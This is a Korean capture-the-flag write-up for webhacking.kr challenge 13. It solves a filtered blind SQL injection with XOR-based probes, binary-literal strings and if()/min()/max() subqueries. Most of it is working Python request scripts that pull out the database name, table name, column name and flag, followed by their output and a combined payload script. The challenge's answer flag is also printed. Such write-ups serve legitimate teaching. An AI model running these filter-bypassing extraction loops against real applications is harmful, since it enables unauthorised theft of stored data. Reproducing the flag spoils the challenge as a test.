SQL injection 문제입니다.
1을 입력하면 1이 뜨고 그 외에는 0을 출력해주므로 blind SQL injection임을 알 수 있습니다.
필터링되지 않는 문자들을 직접 찾아서 활용해야 합니다.
비트 연산자 중 ^(XOR) 연산자를 필터링하지 않습니다.
먼저 데이터베이스를 구해줍니다.
XOR 연산에서 원하는 값을 구하기 위해 간단한 함수를 구현했습니다.
def calc(num):
    """Return ``num + 1`` when *num* is even and ``num - 1`` when it is odd.

    Decodes the XOR probes used throughout this write-up: the page renders
    its result table only when the injected expression evaluates to 1, and
    ``x ^ num == 1`` holds exactly when ``x == num ^ 1`` -- which, for
    integers, is the value this function returns.
    """
    return num - 1 if num % 2 else num + 1
db 이름 길이를 찾아줍니다.
# Walk length(database()) upward, one probe per request.  The page only
# renders its result table when the injected value is 1, and
# `length(database()) ^ n` is 1 exactly when the length equals n ^ 1,
# i.e. calc(n).  Each probe is its own POST whose `?no=` differs only in
# the trailing number, so in an access log the walk appears as a dense
# burst of near-identical requests -- the signature a rate limit or a
# log review would pick up.
db_length = 0
found = False
while not found:
    db_length += 1
    print(db_length, end=',')
    payload = f'?no=(length(database())^{db_length})'
    resp = requests.post(host + payload, cookies=cookie)
    found = '<table border=1 cellpadding=10 width=200>' in resp.text
    if found:
        db_length = calc(db_length)
        print("db_length:", db_length)
1,2,3,4,5,6,db_length: 7
db 이름을 찾아줍니다.
# Recover database() one character at a time.  For position pos the probe
# `ord(substr(database(),pos,1)) ^ code` is 1 exactly when the character
# code equals code ^ 1 (= calc(code)); sweeping code from 127 down to 48
# covers ASCII 48..127.  There is no fallback branch, so a character
# outside that range is never matched and db_name silently ends up short.
db_name = ''
for pos in range(1, db_length + 1):
    print(pos, end=': ')
    for code in range(127, 47, -1):
        print(code, end=',')
        payload = f'?no=ord(substr(database(),{pos},1))^{code}'
        resp = requests.post(host + payload, cookies=cookie)
        if '<table border=1 cellpadding=10 width=200>' not in resp.text:
            continue
        ch = chr(calc(code))
        db_name += ch
        print(f" {pos}'s db_name:", ch)
        break
print(db_name)
1: 127,126,125,124,123,122,121,120,119,118,117,116,115,114,113,112,111,110,109,108,107,106,105,104,103,102,101,100,99,98, 1's db_name: c
2: 127,126,125,124,123,122,121,120,119,118,117,116,115,114,113,112,111,110,109,108,107,106,105, 2's db_name: h
3: 127,126,125,124,123,122,121,120,119,118,117,116,115,114,113,112,111,110,109,108,107,106,105,104,103,102,101,100,99,98,97,96, 3's db_name: a
4: 127,126,125,124,123,122,121,120,119,118,117,116,115,114,113,112,111,110,109, 4's db_name: l
5: 127,126,125,124,123,122,121,120,119,118,117,116,115,114,113,112,111,110,109, 5's db_name: l
6: 127,126,125,124,123,122,121,120,119,118,117,116,115,114,113,112,111,110,109,108,107,106,105,104,103,102,101,100,99,98,97,96,95,94,93,92,91,90,89,88,87,86,85,84,83,82,81,80,79,78,77,76,75,74,73,72,71,70,69,68,67,66,65,64,63,62,61,60,59,58,57,56,55,54,53,52,51,50,49,48, 6's db_name: 1
7: 127,126,125,124,123,122,121,120,119,118,117,116,115,114,113,112,111,110,109,108,107,106,105,104,103,102,101,100,99,98,97,96,95,94,93,92,91,90,89,88,87,86,85,84,83,82,81,80,79,78,77,76,75,74,73,72,71,70,69,68,67,66,65,64,63,62,61,60,59,58,57,56,55,54,53,52,51,50, 7's db_name: 3
chall13
이제 테이블에 관련된 정보를 찾아야하는데 이 부분에서 막혀서 라이트업을 살짝 봤습니다.
문자열 전달이 되지 않을 때 이진수를 활용해서도 전달할 수 있었습니다.
또한 if 문을 활용해 where 필터링을 우회할 수 있으며
서브쿼리의 결과를 하나로 지정해주기 위해 max, min, group_concat 함수를 활용할 수 있습니다.
테이블 개수를 찾아줍니다.
# Count the tables whose table_schema is the database found above.  The
# schema name is supplied as a binary literal because, as the write-up
# notes, string literals do not get through; if() maps non-matching rows
# to NULL, which count() does not include.  The XOR probe is 1 only when
# the count equals calc(table_count).
table_count = 0
found = False
while not found:
    table_count += 1
    print(table_count, end=',')
    payload = f'?no=(select(count(if((table_schema)in(0b01100011011010000110000101101100011011000011000100110011),table_name,null)))from(information_schema.tables))^{table_count}'
    resp = requests.post(host + payload, cookies=cookie)
    found = '<table border=1 cellpadding=10 width=200>' in resp.text
    if found:
        table_count = calc(table_count)
        print("table count:", table_count)
1,2,3,table count: 2
테이블 이름 길이를 찾아줍니다.
# Length of the first table name (min() collapses the per-row if() values
# into one name; the write-up notes max() would give the other table,
# `list`).  Same XOR probe as before: the table is rendered only when the
# length equals calc(table_len).
table_len = 0
found = False
while not found:
    table_len += 1
    print(table_len, end=',')
    payload = f'?no=(select(length(min(if((table_schema)in(0b01100011011010000110000101101100011011000011000100110011),table_name,null))))from(information_schema.tables))^{table_len}'
    resp = requests.post(host + payload, cookies=cookie)
    found = '<table border=1 cellpadding=10 width=200>' in resp.text
    if found:
        table_len = calc(table_len)
        print("table len:", table_len)
1,2,3,4,5,6,7,8,9,10,11,12,table len: 13
테이블 이름을 찾아줍니다.
(max로 찾은 이름은 list)
# Read the min() table name character by character.  The probe
# `ord(substr(...,pos,1)) ^ code` succeeds only when the character code
# is calc(code); the sweep covers ASCII 48..127 and has no fallback, so
# a character outside that range would be dropped without notice.
table_name = ''
for pos in range(1, table_len + 1):
    print(pos, end=': ')
    for code in range(127, 47, -1):
        print(code, end=',')
        payload = f'?no=(select(ord(substr(min(if((table_schema)in(0b01100011011010000110000101101100011011000011000100110011),table_name,null)),{pos},1)))from(information_schema.tables))^{code}'
        resp = requests.post(host + payload, cookies=cookie)
        if '<table border=1 cellpadding=10 width=200>' not in resp.text:
            continue
        ch = chr(calc(code))
        table_name += ch
        print(f" {pos}'s table_name:", ch)
        break
print(table_name)
1: 127,126,125,124,123,122,121,120,119,118,117,116,115,114,113,112,111,110,109,108,107,106,105,104,103, 1's table_name: f
2: 127,126,125,124,123,122,121,120,119,118,117,116,115,114,113,112,111,110,109, 2's table_name: l
3: 127,126,125,124,123,122,121,120,119,118,117,116,115,114,113,112,111,110,109,108,107,106,105,104,103,102,101,100,99,98,97,96, 3's table_name: a
4: 127,126,125,124,123,122,121,120,119,118,117,116,115,114,113,112,111,110,109,108,107,106,105,104,103,102, 4's table_name: g
5: 127,126,125,124,123,122,121,120,119,118,117,116,115,114,113,112,111,110,109,108,107,106,105,104,103,102,101,100,99,98,97,96,95,94, 5's table_name: _
6: 127,126,125,124,123,122,121,120,119,118,117,116,115,114,113,112,111,110,109,108,107,106,105,104,103,102,101,100,99,98,97,96, 6's table_name: a
7: 127,126,125,124,123,122,121,120,119,118,117,116,115,114,113,112,111,110,109,108,107,106,105,104,103,102,101,100,99, 7's table_name: b
8: 127,126,125,124,123,122,121,120,119,118,117,116,115,114,113,112,111,110,109,108,107,106,105,104,103,102,101,100,99,98,97,96,95,94,93,92,91,90,89,88,87,86,85,84,83,82,81,80,79,78,77,76,75,74,73,72,71,70,69,68,67,66,65,64,63,62,61,60,59,58,57,56,55,54, 8's table_name: 7
9: 127,126,125,124,123,122,121,120,119,118,117,116,115,114,113,112,111,110,109,108,107,106,105,104,103,102,101,100,99,98,97,96,95,94,93,92,91,90,89,88,87,86,85,84,83,82,81,80,79,78,77,76,75,74,73,72,71,70,69,68,67,66,65,64,63,62,61,60,59,58,57,56,55,54,53,52,51,50, 9's table_name: 3
10: 127,126,125,124,123,122,121,120,119,118,117,116,115,114,113,112,111,110,109,108,107,106,105,104,103,102,101,100,99,98,97,96,95,94,93,92,91,90,89,88,87,86,85,84,83,82,81,80,79,78,77,76,75,74,73,72,71,70,69,68,67,66,65,64,63,62,61,60,59,58,57,56,55,54,53,52,51,50, 10's table_name: 3
11: 127,126,125,124,123,122,121,120,119,118,117,116,115,114,113,112,111,110,109,108,107,106,105,104,103,102,101,100,99,98,97,96,95,94,93,92,91,90,89,88,87,86,85,84,83,82,81,80,79,78,77,76,75,74,73,72,71,70,69,68,67,66,65,64,63,62,61,60,59,58,57,56,55,54, 11's table_name: 7
12: 127,126,125,124,123,122,121,120,119,118,117,116,115,114,113,112,111,110,109,108,107,106,105,104,103,102,101,100,99,98,97,96,95,94,93,92,91,90,89,88,87,86,85,84,83,82,81,80,79,78,77,76,75,74,73,72,71,70,69,68,67,66,65,64,63,62,61,60,59,58,57,56,55, 12's table_name: 6
13: 127,126,125,124,123,122,121,120,119,118,117,116,115,114,113,112,111,110,109,108,107,106,105,104,103,102,101,100,99,98,97,96,95,94,93,92,91,90,89,88,87,86,85,84,83,82,81,80,79,78,77,76,75,74,73,72,71,70,69,68,67,66,65,64,63,62,61,60,59,58,57, 13's table_name: 8
flag_ab733768
칼럼의 개수를 찾아줍니다.
(list 테이블은 칼럼의 개수가 0개 입니다.. 삽질..)
# Count the columns of the table found above (its name is again passed as
# a binary literal).  Unlike the earlier loops this one increments after
# the probe, so the first request uses probe 0 and checks for a count of
# calc(0) = 1.
col_count = 0
found = False
while not found:
    print(col_count, end=',')
    payload = f'?no=(select(count(if((table_name)in(0b01100110011011000110000101100111010111110110000101100010001101110011001100110011001101110011011000111000),column_name,null)))from(information_schema.columns))^{col_count}'
    resp = requests.post(host + payload, cookies=cookie)
    found = '<table border=1 cellpadding=10 width=200>' in resp.text
    if found:
        col_count = calc(col_count)
        print(" col_count:", col_count)
    else:
        col_count += 1
0, col_count: 1
칼럼의 길이를 찾아줍니다.
# Length of the column name; max() reduces the per-row if() values to a
# single name.  The result table is rendered only when the length equals
# calc(col_len).
col_len = 0
found = False
while not found:
    col_len += 1
    print(col_len, end=',')
    payload = f'?no=(select(length(max(if((table_name)in(0b01100110011011000110000101100111010111110110000101100010001101110011001100110011001101110011011000111000),column_name,null))))from(information_schema.columns))^{col_len}'
    resp = requests.post(host + payload, cookies=cookie)
    found = '<table border=1 cellpadding=10 width=200>' in resp.text
    if found:
        col_len = calc(col_len)
        print(" col_len:", col_len)
1,2,3,4,5,6,7,8,9,10,11,12, col_len: 13
칼럼의 이름을 찾아줍니다.
# Read the column name character by character with the same
# `ord(substr(...)) ^ code` probe; only ASCII 48..127 is swept and a
# miss leaves the position out of col_name without any warning.
col_name = ''
for pos in range(1, col_len + 1):
    print(pos, end=': ')
    for code in range(127, 47, -1):
        print(code, end=',')
        payload = f'?no=(select(ord(substr(max(if((table_name)in(0b01100110011011000110000101100111010111110110000101100010001101110011001100110011001101110011011000111000),column_name,null)),{pos},1)))from(information_schema.columns))^{code}'
        resp = requests.post(host + payload, cookies=cookie)
        if '<table border=1 cellpadding=10 width=200>' not in resp.text:
            continue
        ch = chr(calc(code))
        col_name += ch
        print(f" {pos}'s col_name:", ch)
        break
print(col_name)
1: 127,126,125,124,123,122,121,120,119,118,117,116,115,114,113,112,111,110,109,108,107,106,105,104,103, 1's col_name: f
2: 127,126,125,124,123,122,121,120,119,118,117,116,115,114,113,112,111,110,109, 2's col_name: l
3: 127,126,125,124,123,122,121,120,119,118,117,116,115,114,113,112,111,110,109,108,107,106,105,104,103,102,101,100,99,98,97,96, 3's col_name: a
4: 127,126,125,124,123,122,121,120,119,118,117,116,115,114,113,112,111,110,109,108,107,106,105,104,103,102, 4's col_name: g
5: 127,126,125,124,123,122,121,120,119,118,117,116,115,114,113,112,111,110,109,108,107,106,105,104,103,102,101,100,99,98,97,96,95,94, 5's col_name: _
6: 127,126,125,124,123,122,121,120,119,118,117,116,115,114,113,112,111,110,109,108,107,106,105,104,103,102,101,100,99,98,97,96,95,94,93,92,91,90,89,88,87,86,85,84,83,82,81,80,79,78,77,76,75,74,73,72,71,70,69,68,67,66,65,64,63,62,61,60,59,58,57,56,55,54,53,52,51,50, 6's col_name: 3
7: 127,126,125,124,123,122,121,120,119,118,117,116,115,114,113,112,111,110,109,108,107,106,105,104,103,102,101,100,99,98,97,96, 7's col_name: a
8: 127,126,125,124,123,122,121,120,119,118,117,116,115,114,113,112,111,110,109,108,107,106,105,104,103,102,101,100,99,98,97,96,95,94,93,92,91,90,89,88,87,86,85,84,83,82,81,80,79,78,77,76,75,74,73,72,71,70,69,68,67,66,65,64,63,62,61,60,59,58,57,56,55,54,53,52, 8's col_name: 5
9: 127,126,125,124,123,122,121,120,119,118,117,116,115,114,113,112,111,110,109,108,107,106,105,104,103,102,101,100,99,98,97,96,95,94,93,92,91,90,89,88,87,86,85,84,83,82,81,80,79,78,77,76,75,74,73,72,71,70,69,68,67,66,65,64,63,62,61,60,59,58,57,56,55,54,53,52, 9's col_name: 5
10: 127,126,125,124,123,122,121,120,119,118,117,116,115,114,113,112,111,110,109,108,107,106,105,104,103,102,101,100,99, 10's col_name: b
11: 127,126,125,124,123,122,121,120,119,118,117,116,115,114,113,112,111,110,109,108,107,106,105,104,103,102,101,100,99,98,97,96,95,94,93,92,91,90,89,88,87,86,85,84,83,82,81,80,79,78,77,76,75,74,73,72,71,70,69,68,67,66,65,64,63,62,61,60,59,58,57,56,55,54,53,52,51,50, 11's col_name: 3
12: 127,126,125,124,123,122,121,120,119,118,117,116,115,114,113,112,111,110,109,108,107,106,105,104,103,102,101,100,99,98,97,96,95,94,93,92,91,90,89,88,87,86,85,84,83,82,81,80,79,78,77,76,75,74,73,72,71,70,69,68,67,66,65,64,63,62,61,60,59,58,57,56,55,54,53,52,51,50,49,48, 12's col_name: 1
13: 127,126,125,124,123,122,121,120,119,118,117,116,115,114,113,112,111,110,109,108,107,106,105,104,103,102,101, 13's col_name: d
flag_3a55b31d
데이터 레코드 개수를 조회합니다.
# Number of rows in the discovered table.  Probes start at 0 and are
# incremented after each miss, so probe n checks for a row count of
# calc(n).
data_count = 0
found = False
while not found:
    print(data_count, end=',')
    payload = f'?no=(select(count((flag_3a55b31d)))from(flag_ab733768))^{data_count}'
    resp = requests.post(host + payload, cookies=cookie)
    found = '<table border=1 cellpadding=10 width=200>' in resp.text
    if found:
        data_count = calc(data_count)
        print(" data_count:", data_count)
    else:
        data_count += 1
0,1,2,3, data_count: 2
데이터의 길이를 찾아줍니다.
(min과 max를 비교해서 더 큰 친구가 플래그일 것으로 예상해서 접근)
# Length of max(flag_3a55b31d) -- the write-up guesses the larger of the
# two rows is the flag.  Probes start at 0 and advance after each miss;
# the table renders only when the length equals calc(data_len).
data_len = 0
found = False
while not found:
    print(data_len, end=',')
    payload = f'?no=(select(length(max(flag_3a55b31d)))from(flag_ab733768))^{data_len}'
    resp = requests.post(host + payload, cookies=cookie)
    found = '<table border=1 cellpadding=10 width=200>' in resp.text
    if found:
        data_len = calc(data_len)
        print(" data_len:", data_len)
    else:
        data_len += 1
0,1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26, data_len: 27
마지막으로 레코드 값을 조회해 플래그를 찾아냅니다.
# Read the max() row character by character.  Each position costs up to
# 80 requests (codes 127 down to 48); a character outside that range is
# never matched and simply does not appear in the result.
flag = ''
for pos in range(1, data_len + 1):
    print(pos, end=': ')
    for code in range(127, 47, -1):
        print(code, end=',')
        payload = f'?no=(select(ord(substr(max(flag_3a55b31d),{pos},1)))from(flag_ab733768))^{code}'
        resp = requests.post(host + payload, cookies=cookie)
        if '<table border=1 cellpadding=10 width=200>' not in resp.text:
            continue
        ch = chr(calc(code))
        flag += ch
        print(f" {pos}'s data:", ch)
        break
print(flag)
1: 127,126,125,124,123,122,121,120,119,118,117,116,115,114,113,112,111,110,109,108,107,106,105,104,103,102,101,100,99,98,97,96,95,94,93,92,91,90,89,88,87,86,85,84,83,82,81,80,79,78,77,76,75,74,73,72,71, 1's data: F
2: 127,126,125,124,123,122,121,120,119,118,117,116,115,114,113,112,111,110,109,108,107,106,105,104,103,102,101,100,99,98,97,96,95,94,93,92,91,90,89,88,87,86,85,84,83,82,81,80,79,78,77, 2's data: L
3: 127,126,125,124,123,122,121,120,119,118,117,116,115,114,113,112,111,110,109,108,107,106,105,104,103,102,101,100,99,98,97,96,95,94,93,92,91,90,89,88,87,86,85,84,83,82,81,80,79,78,77,76,75,74,73,72,71,70,69,68,67,66,65,64, 3's data: A
4: 127,126,125,124,123,122,121,120,119,118,117,116,115,114,113,112,111,110,109,108,107,106,105,104,103,102,101,100,99,98,97,96,95,94,93,92,91,90,89,88,87,86,85,84,83,82,81,80,79,78,77,76,75,74,73,72,71,70, 4's data: G
5: 127,126,125,124,123,122, 5's data: {
6: 127,126,125,124,123,122,121,120,119,118,117,116,115,114,113,112,111,110,109,108,107,106,105,104,103,102,101,100,99,98, 6's data: c
7: 127,126,125,124,123,122,121,120,119,118,117,116,115,114,113,112,111,110,109,108,107,106,105, 7's data: h
8: 127,126,125,124,123,122,121,120,119,118,117,116,115,114,113,112,111,110,109,108,107,106,105,104,103,102,101,100,99,98,97,96, 8's data: a
9: 127,126,125,124,123,122,121,120,119,118,117,116,115,114,113,112,111,110,109, 9's data: l
10: 127,126,125,124,123,122,121,120,119,118,117,116,115,114,113,112,111,110,109, 10's data: l
11: 127,126,125,124,123,122,121,120,119,118,117,116,115,114,113,112,111,110,109,108,107,106,105,104,103,102,101,100, 11's data: e
12: 127,126,125,124,123,122,121,120,119,118,117,116,115,114,113,112,111, 12's data: n
13: 127,126,125,124,123,122,121,120,119,118,117,116,115,114,113,112,111,110,109,108,107,106,105,104,103,102, 13's data: g
14: 127,126,125,124,123,122,121,120,119,118,117,116,115,114,113,112,111,110,109,108,107,106,105,104,103,102,101,100, 14's data: e
15: 127,126,125,124,123,122,121,120,119,118,117,116,115,114,113,112,111,110,109,108,107,106,105,104,103,102,101,100,99,98,97,96,95,94,93,92,91,90,89,88,87,86,85,84,83,82,81,80,79,78,77,76,75,74,73,72,71,70,69,68,67,66,65,64,63,62,61,60,59,58,57,56,55,54,53,52,51,50,49,48, 15's data: 1
16: 127,126,125,124,123,122,121,120,119,118,117,116,115,114,113,112,111,110,109,108,107,106,105,104,103,102,101,100,99,98,97,96,95,94,93,92,91,90,89,88,87,86,85,84,83,82,81,80,79,78,77,76,75,74,73,72,71,70,69,68,67,66,65,64,63,62,61,60,59,58,57,56,55,54,53,52,51,50, 16's data: 3
17: 127,126,125,124,123,122,121,120,119,118,117,116,115,114,113,112,111,110,109,108,107,106,105,104,103,102, 17's data: g
18: 127,126,125,124,123,122,121,120,119,118,117,116, 18's data: u
19: 127,126,125,124,123,122,121,120,119,118,117,116,115,114,113,112,111,110,109,108, 19's data: m
20: 127,126,125,124,123,122,121,120,119,118,117,116,115,114,113,112,111,110,109,108, 20's data: m
21: 127,126,125,124,123,122,121,120, 21's data: y
22: 127,126,125,124,123,122,121,120,119,118,117,116,115,114,113,112,111,110,109,108,107,106,105,104,103,102,101,100,99,98, 22's data: c
23: 127,126,125,124,123,122,121,120,119,118,117,116,115,114,113,112,111,110,109, 23's data: l
24: 127,126,125,124,123,122,121,120,119,118,117,116,115,114,113,112,111,110,109,108,107,106,105,104,103,102,101,100, 24's data: e
25: 127,126,125,124,123,122,121,120,119,118,117,116,115,114,113,112,111,110,109,108,107,106,105,104,103,102,101,100,99,98,97,96, 25's data: a
26: 127,126,125,124,123,122,121,120,119,118,117,116,115, 26's data: r
27: 127,126,125,124, 27's data: }
FLAG{challenge13gummyclear}
끝!
레퍼런스
페이로드 종합본
import requests
# Challenge endpoint and session cookie used by every request below.
# The PHPSESSID value is left blank on the page.
host = "https://webhacking.kr/challenge/web-10/"
cookie = {'PHPSESSID': ''}

# Characters and keywords the author recorded while probing the
# challenge's input filter: the same 15 characters as hex codes and as
# literals, then a keyword list.
# NOTE(review): presumably this is the blocked set -- every payload below
# avoids all of them -- but the page itself does not label it.
'''
['0x9', '0xa', '0xb', '0xc', '0xd', '0x20', '0x2a', '0x2b', '0x2d', '0x2f', '0x3c', '0x3d', '0x3e', '0x40', '0x7c']
['\t', '\n', '\x0b', '\x0c', '\r', ' ', '*', '+', '-', '/', '<', '=', '>', '@', '|']
union, like, where, and, limit, char, ascii
'''
def calc(num):
    """Return ``num + 1`` for even *num* and ``num - 1`` for odd *num*.

    The probes in this script XOR an unknown value with ``num`` and the
    page renders its result table only when that XOR is 1, which happens
    exactly when the unknown equals ``num ^ 1`` -- the value returned here
    for integer input.
    """
    return num + 1 if num % 2 == 0 else num - 1
# Find length(database()) by walking the probe upward.  The injected
# expression `length(database()) ^ n` is 1 -- and the table is rendered --
# exactly when the length is calc(n).  One POST per probe: the walk is a
# burst of requests whose `?no=` differs only in the last number, which is
# what stands out in server logs.
db_length = 0
found = False
while not found:
    db_length += 1
    print(db_length, end=',')
    payload = f'?no=(length(database())^{db_length})'
    resp = requests.post(host + payload, cookies=cookie)
    found = '<table border=1 cellpadding=10 width=200>' in resp.text
    if found:
        db_length = calc(db_length)
        print("db_length:", db_length)
# Recover database() character by character.  At position pos the probe
# `ord(substr(database(),pos,1)) ^ code` succeeds only when the character
# code is calc(code).  Codes 127..48 are swept; no fallback exists, so a
# character outside ASCII 48..127 is silently missing from db_name.
db_name = ''
for pos in range(1, db_length + 1):
    print(pos, end=': ')
    for code in range(127, 47, -1):
        print(code, end=',')
        payload = f'?no=ord(substr(database(),{pos},1))^{code}'
        resp = requests.post(host + payload, cookies=cookie)
        if '<table border=1 cellpadding=10 width=200>' not in resp.text:
            continue
        ch = chr(calc(code))
        db_name += ch
        print(f" {pos}'s db_name:", ch)
        break
print(db_name)
# (select(count(if((table_schema)in(0b01100011011010000110000101101100011011000011000100110011),table_name,0)))from(information_schema.tables))
# Count the tables in the schema found above.  The schema name is given as
# a binary literal (string literals do not get through the filter, per the
# write-up); if() turns other rows into NULL, which count() ignores.  The
# table renders only when the count equals calc(table_count).
table_count = 0
found = False
while not found:
    table_count += 1
    print(table_count, end=',')
    payload = f'?no=(select(count(if((table_schema)in(0b01100011011010000110000101101100011011000011000100110011),table_name,null)))from(information_schema.tables))^{table_count}'
    resp = requests.post(host + payload, cookies=cookie)
    found = '<table border=1 cellpadding=10 width=200>' in resp.text
    if found:
        table_count = calc(table_count)
        print("table count:", table_count)
# 'chall13' == 0b01100011011010000110000101101100011011000011000100110011
# Length of the min() table name (min() collapses the per-row if() values
# to a single name).  The probe succeeds when the length is calc(table_len).
table_len = 0
found = False
while not found:
    table_len += 1
    print(table_len, end=',')
    payload = f'?no=(select(length(min(if((table_schema)in(0b01100011011010000110000101101100011011000011000100110011),table_name,null))))from(information_schema.tables))^{table_len}'
    resp = requests.post(host + payload, cookies=cookie)
    found = '<table border=1 cellpadding=10 width=200>' in resp.text
    if found:
        table_len = calc(table_len)
        print("table len:", table_len)
# Read the min() table name one character at a time.  The
# `ord(substr(...)) ^ code` probe succeeds only for code == ord ^ 1; the
# sweep covers ASCII 48..127 and a miss drops the position silently.
table_name = ''
for pos in range(1, table_len + 1):
    print(pos, end=': ')
    for code in range(127, 47, -1):
        print(code, end=',')
        payload = f'?no=(select(ord(substr(min(if((table_schema)in(0b01100011011010000110000101101100011011000011000100110011),table_name,null)),{pos},1)))from(information_schema.tables))^{code}'
        resp = requests.post(host + payload, cookies=cookie)
        if '<table border=1 cellpadding=10 width=200>' not in resp.text:
            continue
        ch = chr(calc(code))
        table_name += ch
        print(f" {pos}'s table_name:", ch)
        break
print(table_name)
# (select(count(if((table_name)in(0b01100110011011000110000101100111010111110110000101100010001101110011001100110011001101110011011000111000),column_name,null)))from(information_schema.columns))
# flag_ab733768 == 0b01100110011011000110000101100111010111110110000101100010001101110011001100110011001101110011011000111000
# Count the columns of the table found above (name passed as a binary
# literal).  This loop increments after the probe, so the first request
# uses probe 0 and checks for a count of calc(0) = 1.
col_count = 0
found = False
while not found:
    print(col_count, end=',')
    payload = f'?no=(select(count(if((table_name)in(0b01100110011011000110000101100111010111110110000101100010001101110011001100110011001101110011011000111000),column_name,null)))from(information_schema.columns))^{col_count}'
    resp = requests.post(host + payload, cookies=cookie)
    found = '<table border=1 cellpadding=10 width=200>' in resp.text
    if found:
        col_count = calc(col_count)
        print(" col_count:", col_count)
    else:
        col_count += 1
# select(length(max(if((table_name)in("scientist"),column_name,null))))from(information_schema.columns)
# Length of the column name (max() reduces the if() values to one name).
# The probe succeeds when the length equals calc(col_len).
col_len = 0
found = False
while not found:
    col_len += 1
    print(col_len, end=',')
    payload = f'?no=(select(length(max(if((table_name)in(0b01100110011011000110000101100111010111110110000101100010001101110011001100110011001101110011011000111000),column_name,null))))from(information_schema.columns))^{col_len}'
    resp = requests.post(host + payload, cookies=cookie)
    found = '<table border=1 cellpadding=10 width=200>' in resp.text
    if found:
        col_len = calc(col_len)
        print(" col_len:", col_len)
# Read the column name character by character; the sweep covers ASCII
# 48..127 only and a position with no match is left out of col_name
# without any warning.
col_name = ''
for pos in range(1, col_len + 1):
    print(pos, end=': ')
    for code in range(127, 47, -1):
        print(code, end=',')
        payload = f'?no=(select(ord(substr(max(if((table_name)in(0b01100110011011000110000101100111010111110110000101100010001101110011001100110011001101110011011000111000),column_name,null)),{pos},1)))from(information_schema.columns))^{code}'
        resp = requests.post(host + payload, cookies=cookie)
        if '<table border=1 cellpadding=10 width=200>' not in resp.text:
            continue
        ch = chr(calc(code))
        col_name += ch
        print(f" {pos}'s col_name:", ch)
        break
print(col_name)
# table: flag_ab733768
# column: flag_3a55b31d
# Row count of the discovered table.  Probes start at 0 and advance after
# each miss; probe n checks for a count of calc(n).
data_count = 0
found = False
while not found:
    print(data_count, end=',')
    payload = f'?no=(select(count((flag_3a55b31d)))from(flag_ab733768))^{data_count}'
    resp = requests.post(host + payload, cookies=cookie)
    found = '<table border=1 cellpadding=10 width=200>' in resp.text
    if found:
        data_count = calc(data_count)
        print(" data_count:", data_count)
    else:
        data_count += 1
# Length of max(flag_3a55b31d); the write-up picks max() on the guess that
# the larger of the two rows is the flag.  Probes start at 0 and advance
# after each miss until the length equals calc(data_len).
data_len = 0
found = False
while not found:
    print(data_len, end=',')
    payload = f'?no=(select(length(max(flag_3a55b31d)))from(flag_ab733768))^{data_len}'
    resp = requests.post(host + payload, cookies=cookie)
    found = '<table border=1 cellpadding=10 width=200>' in resp.text
    if found:
        data_len = calc(data_len)
        print(" data_len:", data_len)
    else:
        data_len += 1
# Read the max() row one character at a time: up to 80 requests per
# position (codes 127 down to 48).  A character outside ASCII 48..127 is
# never matched and simply does not appear in the result.
flag = ''
for pos in range(1, data_len + 1):
    print(pos, end=': ')
    for code in range(127, 47, -1):
        print(code, end=',')
        payload = f'?no=(select(ord(substr(max(flag_3a55b31d),{pos},1)))from(flag_ab733768))^{code}'
        resp = requests.post(host + payload, cookies=cookie)
        if '<table border=1 cellpadding=10 width=200>' not in resp.text:
            continue
        ch = chr(calc(code))
        flag += ch
        print(f" {pos}'s data:", ch)
        break
print(flag)